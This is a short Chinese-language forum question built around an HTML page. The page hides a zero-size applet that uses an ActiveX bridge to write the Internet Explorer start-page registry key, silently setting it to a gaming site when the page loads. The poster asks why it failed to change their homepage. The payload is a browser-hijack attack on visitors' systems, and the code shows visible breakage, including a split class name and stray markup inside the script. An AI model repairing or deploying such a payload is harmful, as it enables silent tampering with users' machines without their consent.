有一段代码:
<html>
<head> 
<title> </title> 
<body>   
<script>   
document.write('<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXcomp onent></APPLET>')   
 <!--使用函数调用ActiveX-->
   function f()   
    {      x1=document.applets[0];     
       x1.setCLSID('{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}'); 
       x1.createInstance();  
       xm=x1.GetObject();     
   xm.RegWrite('HKCU\\Software\\Microsoft\\InternetExplorer\\Main\\Start Page','http://dota.replays.net/');   <br />
   }  
  function init()   
  {   
   setTimeout('f()',1000); 
  }    
  init();   
  </script> 
    </body> 
  </html> 在电脑上运行后,怎么没有改变我电脑IE的首页?求高手指点!
用的是WEB服务器是tomcat